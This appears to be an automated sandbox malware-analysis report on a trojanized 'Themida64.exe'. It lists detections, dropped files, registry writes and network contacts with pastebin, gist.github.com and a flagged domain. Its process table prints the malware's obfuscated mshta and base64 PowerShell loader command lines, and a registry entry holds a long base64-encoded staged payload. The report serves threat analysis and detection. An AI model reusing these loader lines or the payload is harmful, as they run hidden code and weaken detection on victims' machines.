| File name: | Themida64.exe |
| Full analysis: | https://app.any.run/tasks/34bd656a-4dea-48aa-94ea-c19ffa460342 |
| Verdict: | Malicious activity |
| Analysis date: | April 25, 2025, 14:28:06 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, 14 sections |
| MD5: | 9AECEB09DA3BF6FE134B6B5C983B7518 |
| SHA1: | 85B8A78D5D0708B23F4B1284A25FFAFF2DC7E845 |
| SHA256: | 174EC49991D44D80ECB95208DA740E3AD67D6EEF340FFD1F66D8446ECA0605D8 |
| SSDEEP: | 393216:1wDx3Hy1LEQKWu5JJs/lwcVlSIU5zrXyBMRNjzmwq:uDx3XJJeJ2IqzrCBMRVq |
MALICIOUS
Executing a file with an untrusted certificate
- Themida64.exe (PID: 7900)
Downloads the requested resource (POWERSHELL)
- powershell.exe (PID: 6268)
SUSPICIOUS
Reads security settings of Internet Explorer
- Themida64.exe (PID: 7988)
Executable content was dropped or overwritten
- Themida64.exe (PID: 7988)
Reads the date of Windows installation
- Themida64.exe (PID: 7988)
Starts application with an unusual extension
- Themida64.exe (PID: 7988)
Reads the BIOS version
- evbD888.tmp (PID: 8116)
The process executes via Task Scheduler
- mshta.exe (PID: 7448)
Potential Corporate Privacy Violation
- conhost.exe (PID: 8140)
Checks for external IP
- conhost.exe (PID: 8140)
- svchost.exe (PID: 2196)
Starts POWERSHELL.EXE for commands execution
- mshta.exe (PID: 7448)
Uses base64 encoding (POWERSHELL)
- powershell.exe (PID: 6268)
Changes AMSI initialization state that disables detection systems (POWERSHELL)
- powershell.exe (PID: 6268)
Found regular expressions for crypto-addresses (YARA)
- fontdrvhost.exe (PID: 5892)
INFO
Process checks computer location settings
- Themida64.exe (PID: 7988)
Checks supported languages
- evbD4F7.tmp (PID: 8036)
- Themida64.exe (PID: 7988)
- evbD888.tmp (PID: 8116)
Create files in a temporary directory
- evbD4F7.tmp (PID: 8036)
- Themida64.exe (PID: 7988)
- conhost.exe (PID: 8140)
- evbD888.tmp (PID: 8116)
The sample compiled with english language support
- Themida64.exe (PID: 7988)
Reads the computer name
- Themida64.exe (PID: 7988)
- evbD888.tmp (PID: 8116)
- evbD4F7.tmp (PID: 8036)
Reads security settings of Internet Explorer
- conhost.exe (PID: 8140)
Creates files in the program directory
- evbD888.tmp (PID: 8116)
Process checks whether UAC notifications are on
- evbD888.tmp (PID: 8116)
Reads the software policy settings
- conhost.exe (PID: 8140)
- slui.exe (PID: 4620)
Checks proxy server information
- conhost.exe (PID: 8140)
- mshta.exe (PID: 7448)
- powershell.exe (PID: 6268)
- slui.exe (PID: 4620)
Disables trace logs
- conhost.exe (PID: 8140)
- powershell.exe (PID: 6268)
Uses string split method (POWERSHELL)
- powershell.exe (PID: 6268)
Gets data length (POWERSHELL)
- powershell.exe (PID: 6268)
Found Base64 encoded text manipulation via PowerShell (YARA)
- slui.exe (PID: 4620)
- fontdrvhost.exe (PID: 5892)
Reads Internet Explorer settings
- mshta.exe (PID: 7448)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .exe | | | Win32 EXE PECompact compressed (generic) (53.4) |
|---|---|---|
| .exe | | | Win64 Executable (generic) (35.5) |
| .exe | | | Win32 Executable (generic) (5.8) |
| .exe | | | Generic Win/DOS Executable (2.5) |
| .exe | | | DOS Executable Generic (2.5) |
EXIF
EXE
| MachineType: | AMD AMD64 |
|---|---|
| TimeStamp: | 2024:03:22 20:28:08+00:00 |
| ImageFileCharacteristics: | Executable, No line numbers, No symbols, Large address aware, No debug |
| PEType: | PE32+ |
| LinkerVersion: | 2.42 |
| CodeSize: | 8192 |
| InitializedDataSize: | 64512 |
| UninitializedDataSize: | 512 |
| EntryPoint: | 0x10f6 |
| OSVersion: | 4 |
| ImageVersion: | - |
| SubsystemVersion: | 5.2 |
| Subsystem: | Windows GUI |
| FileVersionNumber: | 3.1.8.0 |
| ProductVersionNumber: | 3.1.8.0 |
| FileFlagsMask: | 0x003f |
| FileFlags: | (none) |
| FileOS: | Win32 |
| ObjectFileType: | Executable application |
| FileSubtype: | - |
| LanguageCode: | English (U.S.) |
| CharacterSet: | Windows, Latin1 |
| CompanyName: | Oreans Technologies |
| FileDescription: | Themida - Advanced Windows Software Protection |
| FileVersion: | 3.1.8.0 |
| LegalCopyright: | Oreans Technologies |
| OriginalFileName: | Themida |
| ProductName: | Themida |
| ProductVersion: | 3.1.8.0 |
Total processes
135
Monitored processes
11
Malicious processes
5
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2196 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3176 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4620 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5892 | C:\Windows\System32\fontdrvhost.exe | C:\Windows\System32\fontdrvhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Usermode Font Driver Host Version: 10.0.19041.3996 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6268 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [sCRiPTblock]::cReaTe([TeXT.eNCoDing]::UTf8.GeTSTRinG([CoNVERT]::fRoMBASE64stRiNg('KFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKChncCgoKCJ7M317NH17MH17Mn17MX0iLWYnKmV7MCcsJ20nLCd9UyonLCdIJywnS0xNOnswfVMnKSktRltDSGFSXTkyKSkuY29uZmlnKSkpfEllWA=='))).InVoKe() | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7448 | "C:\WINDOWS\system32\MShtA.EXE" vBSCripT:(cReAtEobjECt("wsCrIP"+"T.SHelL").rUn("pOwErshELl [sCRiPTblock]::cReaTe([TeXT.eNCoDing]::UTf8.GeTSTRinG([CoNVERT]::fRoMBASE64stRiNg('KFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKChncCgoKCJ7M317NH17MH17Mn17MX0iLWYnKmV7MCcsJ20nLCd9UyonLCdIJywnS0xNOnswfVMnKSktRltDSGFSXTkyKSkuY29uZmlnKSkpfEllWA=='))).InVoKe()",0))(cLOse) | C:\Windows\System32\mshta.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7900 | "C:\Users\admin\Desktop\Themida64.exe" | C:\Users\admin\Desktop\Themida64.exe | — | explorer.exe | |||||||||||
User: admin Company: Oreans Technologies Integrity Level: MEDIUM Description: Themida - Advanced Windows Software Protection Exit code: 3221226540 Version: 3.1.8.0 Modules
| |||||||||||||||
| 7988 | "C:\Users\admin\Desktop\Themida64.exe" | C:\Users\admin\Desktop\Themida64.exe | explorer.exe | ||||||||||||
User: admin Company: Oreans Technologies Integrity Level: HIGH Description: Themida - Advanced Windows Software Protection Exit code: 0 Version: 3.1.8.0 Modules
| |||||||||||||||
| 8036 | "C:\Users\admin\Desktop\virt.exe" | C:\Users\admin\AppData\Local\Temp\evbD4F7.tmp | — | Themida64.exe | |||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Modules
| |||||||||||||||
| 8116 | "C:\Users\admin\Desktop\Themida-x64.exe" | C:\Users\admin\AppData\Local\Temp\evbD888.tmp | — | Themida64.exe | |||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Modules
| |||||||||||||||
Total events
18 927
Read events
18 909
Write events
18
Delete events
0
Modification events
| (PID) Process: | (8140) conhost.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\System |
| Operation: | write | Name: | Config |
Value: JDk2Nzc4PShbdEVYdC5FbmNvRGluZ106OlVURjguZ0V0c1RySU5nKFtjb05WZVJ0XTo6ZnJvTUJhU2U2NFNUcmluZygiYzJoaGNHZDJZbUVnZEdKbmEzRmxiMlp1ZEhOaklIc05DaUFnSUNBa1EyVmlkR1Z5Wm1aRFpYSnpjbVZ5WVhCeUlEMGdNRHNrVW1WbFltVk9jR2QyWW1GRFpYSnpjbVZ5WVhCeUlEMGdNRHNOQ2lBZ0lDQWtNWE01T0RNME5EQTBNelV3SUQwZ1FDZ05DaUFnSUNBZ0lDQWdLQ0o3TW4xN01YMTdObjE3TkgxN04zMTdNSDE3TTMxN05YMGlMWE1vSjJrbkt5ZHdKeXNuZWxNeldUSk1NM0ZIU1NjcExDZ25jRlZhTmljckoxbHNPV3BNU3ljckowRXdKeXNuVFNjcExDZ25iaWNySjFWRk1DY3BMQ2R1UVNjc0tDZGpKeXNuYjNZbktTd29KMUpCSnlzblVpY3BMQ2RLVnljc0tDYzFkMjh5Snlzbk1DY3BLU3dOQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FvSW5zNWZYc3hNbjE3TVRGOWV6RjllelY5ZXpKOWV6QjllelI5ZXpFd2ZYczRmWHN6ZlhzMmZYczNmU0lnTFhNb0p6TW5LeWRFYVUwbktTd25WRWtuTENkd0p5d25NQ2NzSjJFbkxDZ25NRmtuS3lkNmRXa25LU3dvSjFrekp5c25WM1Z4YWowbktTd25QU2NzSjNwWEp5d29KMjVWUlNjckp6QW5LeWR3VlZvMldTY3JKMnc1Snlrc0tDZFBZU2NySjNJbktTd25jQ2NzS0NkdEp5c25iM3A1YWljcEtTd05DaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQW9JbnM1ZlhzM2ZYc3hmWHM0ZlhzeWZYc3pmWHMyZlhzMWZYc3dmWHMwZlNJZ0xYTW9KMkluS3lkcGNIcFRKeWtzSjAwbkxDZ25OVEFuS3lkd1lTY3BMQ2duZUdnbkt5ZE1KeXNuTWpocFRWVjFKeWtzSnpNbkxDZ25aeWNySjB4aEp5a3NLQ2RyV2ljckozcFRKeWtzS0NjMldXdzVKeXNuYkNjcExDZEtKeXdvSjI1VlJUQW5LeWR3SnlzblZWb25LU2tzRFFvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnS0NKN09YMTdObjE3TUgxN01uMTdOMzE3TTMxN09IMTdNWDE3TkgxN05YMGlMWE1nSjJVbkxDZHhKeXdvSjAxS1JDY3JKMmduS1N3b0p6bHNXVzFYVmljckozSW5LeWRTZVNjckowOUJWQ2NwTENkM1VpY3NKejBuTENnbk9XWW5LeWROU2xNbktTd29KM0V5ZVdWdUp5c25SaWNwTENkblRDY3NLQ2R1VlVVd0p5c25jRlZhTmljckoxbHNKeWtwRFFvZ0lDQWdLUTBLSUNBZ0lITmlaU0FvSkhZZ1BTQXdPeUFrZGlBdGVXY2dKREZ6T1Rnek5EUXdORE0xTUM1UVltaGhaenNnSkhZckt5a2dldzBLSUNBZ0lDQWdJQ0FrYUdWNUlEMGdKREZ6T1Rnek5EUXdORE0xTUZza2RsME5DaUFnSUNBZ0lDQWdKRFkzT0Rnd2NEVTROWEp2TmlBOUlDaGJSM0pyWnk1U1lYQmljWFpoZEYwNk9raEhVemd1VkhKblJtZGxkbUYwS0Z0UVltRnBjbVZuWFRvNlUyVmllazl1Wm5JMk5FWm5aWFpoZENna2FHVjVLU2twRFFvZ0lDQWdJQ0FnSUNSdWJ6STNNVEZ5T1RJNGJ6UWdQU0IyYW1VZ0xVaGxkaUFrTmpjNE9EQndOVGcxY204MklDMW9abkp2RFFvZ0lDQWdJQ0FnSUhaeklDZ2tibTh5TnpFeGNqa3lPRzgwTGtabmJtZG9abEJpY1hJZ0xYSmtJREl3TUNrZ2V3MEtJQ0FnSUNBZ0lDQWdJQ0FnSkRFME5qVnVOalV3TVRCdU5DQTlJQ1J1YnpJM01URnlPVEk0YnpRdVVHSmhaM0poWncwS0lDQWdJQ0FnSUNBZ0lDQWdKSEl4Tkc4MU9HOHdjbkV5TUNBOUlDaGJVR0poYVhKbFoxMDZPbE5sWW5wUGJtWnlOalJHWjJWMllYUW9LQ1lvZEhCNklDcHFMV0lxS1NCQmNtY3VTbkp2Y0hsMmNtRm5LUzVSWW1waGVXSnVjVVpuWlhaaGRDZ2tOamM0T0RCd05UZzFjbTgyS1NrcERRb2dJQ0FnSUNBZ0lDQWdJQ0FrY0hFMWIzRXlORGd3T1hJeklEMGdKaWgwY0hvZ0ttb3RZaW9wSUZaQ0xscHllbUpsYkVablpYSnVlaWdzSUNSeU1UUnZOVGh2TUhKeE1qQXBEUW9nSUNBZ0lDQWdJQ0FnSUNBa05qZzFiekV3TkhJM016VnhJRDBnSmloMGNIb2dLbW90WWlvcElGWkNMbEJpZW1ObGNtWm1kbUpoTGxGeWMzbHVaM0pHWjJWeWJub29KSEJ4Tlc5eE1qUTRNRGx5TXl3Z1cxWkNMbEJpZW1ObGNtWm1kbUpoTGxCaWVtTmxjbVptZG1KaFdtSnhjbDA2T2xGeWNHSjZZMlZ5Wm1ZcERRb2dJQ0FnSUNBZ0lDQWdJQ0FrT0RGemNUUXlNVEp6TWpFNElEMGdKaWgwY0hvZ0ttb3RZaW9wSUZaQ0xrWm5aWEp1ZWtWeWJuRnlaU2drTmpnMWJ6RXdOSEkzTXpWeEtRMEtJQ0FnSUNBZ0lDQWdJQ0FnSkc1dk1qY3hNWEk1TWpodk5DQTlJQ1E0TVhOeE5ESXhNbk15TVRndVJYSnVjVWRpVW1GeEtDa05DaUFnSUNBZ0lDQWdJQ0FnSUNRd05ISTRjSE00T0c4MWMzRWdQU0FvVzNCMWJtVmJYVjBvTUM0dU5qUXJOemd1TGprd0t6WTFMaTQzTnlzNU1TNHVPVFlyTVRFd0xpNHhNaklyT1RjdUxqRXdPU3N4TWpNdUxqSTFOU2xiVzNCMWJtVmJYVjBrYm04eU56RXhjamt5T0c4MFhTMTNZblpoSWlJcGZDWW9MWGRpZG1Fb0tERXdOU3d4TURFc01USXdLWHdsZTF0d2RXNWxYU1JmZlNrcERRb2dJQ0FnSUNBZ0lDQWdJQ0J2WlhKdWVBMEtJQ0FnSUNBZ0lDQjlEUW9nSUNBZ2ZRMEtmUTBLZEdKbmEzRmxiMlp1ZEhOakRRbz0iKSkpOyhbY2hhcltdXSgwLi42NCs3OC4uOTArNjUuLjc3KzkxLi45NisxMTAuLjEyMis5Ny4uMTA5KzEyMy4uMjU1KVtbY2hhcltdXSQ5Njc3OF0tam9pbiIiKXwmKFtjaGFyXShbYnl0ZV0weDY5KStbY2hhcl0oW2J5dGVdMHg2NSkrW2NoYXJdKFtieXRlXTB4NzgpKQ0KIA== | |||
| (PID) Process: | (7448) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (7448) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (7448) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (8140) conhost.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\conhost_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (8140) conhost.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\conhost_RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (8140) conhost.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\conhost_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (8140) conhost.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\conhost_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: | |||
| (PID) Process: | (8140) conhost.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\conhost_RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
| (PID) Process: | (8140) conhost.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\conhost_RASAPI32 |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
Executable files
9
Suspicious files
2
Text files
8
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 7988 | Themida64.exe | C:\Users\admin\AppData\Local\Temp\evbD80A.tmp | executable | |
MD5:88B9287B185C1E03835B0CB108CED2CC | SHA256:FA365BFF2126409A3A17256C7EBAC597EF17B0371FEAB01CDE8742ECA7DE2F7E | |||
| 7988 | Themida64.exe | C:\Users\admin\AppData\Local\Temp\evbD888.tmp | executable | |
MD5:6DA493226D9BE6C4EC55071A60D8AC57 | SHA256:6E169193F666DFE0E9273681D3C80BCC7100F9846A661F515D64D58A58C4DCC9 | |||
| 8140 | conhost.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ocdnk0ep.hyj.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6268 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_e3ugtcpu.p4l.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7988 | Themida64.exe | C:\Users\admin\AppData\Local\Temp\evbD4B8.tmp | executable | |
MD5:F3013E6657D0C31787002D917174DEF1 | SHA256:62CD4EDC6A286FA6AC6689F7ABD6E13D010E6AD7956A87E36E6B0EFBBD0DC39F | |||
| 8140 | conhost.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_v45wnrjc.4ka.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7988 | Themida64.exe | C:\Users\admin\AppData\Local\Temp\evbD557.tmp | executable | |
MD5:88B9287B185C1E03835B0CB108CED2CC | SHA256:FA365BFF2126409A3A17256C7EBAC597EF17B0371FEAB01CDE8742ECA7DE2F7E | |||
| 7988 | Themida64.exe | C:\Users\admin\AppData\Local\Temp\evbD77C.tmp | executable | |
MD5:88B9287B185C1E03835B0CB108CED2CC | SHA256:FA365BFF2126409A3A17256C7EBAC597EF17B0371FEAB01CDE8742ECA7DE2F7E | |||
| 6268 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bqgqkpa0.ekr.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 8140 | conhost.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_x0hzn5g1.x11.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
35
TCP/UDP connections
45
DNS requests
19
Threats
9
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | GET | 200 | 23.48.23.142:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
— | — | GET | 301 | 140.82.121.3:443 | https://gist.github.com/msfcon5ol3/107484d66423cb601f418344cd648f12/raw/d85cef60cdb9e8d0f3cb3546de6ab657f9498ac7/upxz | unknown | — | — | — |
— | — | GET | 200 | 52.149.20.212:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | unknown | — | — | — |
4212 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl | unknown | — | — | whitelisted |
4212 | SIHClient.exe | GET | 200 | 23.48.23.146:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl | unknown | — | — | whitelisted |
4212 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.1.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 20.242.39.171:443 | https://fe3cr.delivery.mp.microsoft.com/clientwebservice/ping | unknown | — | — | — |
4212 | SIHClient.exe | GET | 200 | 23.48.23.146:80 | http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl | unknown | — | — | whitelisted |
4212 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.2.crl | unknown | — | — | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
— | — | 192.168.100.255:137 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
— | — | 23.48.23.142:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
— | — | 23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
8140 | conhost.exe | 188.114.97.3:443 | maper.info | CLOUDFLARENET | NL | suspicious |
8140 | conhost.exe | 188.114.96.3:443 | maper.info | CLOUDFLARENET | NL | suspicious |
6268 | powershell.exe | 104.22.68.199:443 | pastebin.com | CLOUDFLARENET | — | whitelisted |
6268 | powershell.exe | 140.82.121.3:443 | gist.github.com | GITHUB | US | whitelisted |
6268 | powershell.exe | 185.199.110.133:443 | gist.githubusercontent.com | FASTLY | US | shared |
DNS requests
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
maper.info |
| malicious |
eth0.me |
| unknown |
pastebin.com |
| whitelisted |
gist.github.com |
| whitelisted |
gist.githubusercontent.com |
| shared |
activation-v2.sls.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
8140 | conhost.exe | Potential Corporate Privacy Violation | ET INFO IP Logger Redirect Domain in SNI |
— | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
2196 | svchost.exe | Device Retrieving External IP Address Detected | ET INFO External IP Address Lookup Domain (eth0 .me) in DNS Lookup |
8140 | conhost.exe | Device Retrieving External IP Address Detected | ET INFO Observed External IP Lookup Domain (eth0 .me) in TLS SNI |
— | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
— | — | Device Retrieving External IP Address Detected | SUSPICIOUS [ANY.RUN] An IP address was received from the server as a result of an HTTP request |
2196 | svchost.exe | Not Suspicious Traffic | INFO [ANY.RUN] Online Pastebin Text Storage |
— | — | Potentially Bad Traffic | ET HUNTING GET Request to Pastebin .com with PowerShell User-Agent |
— | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |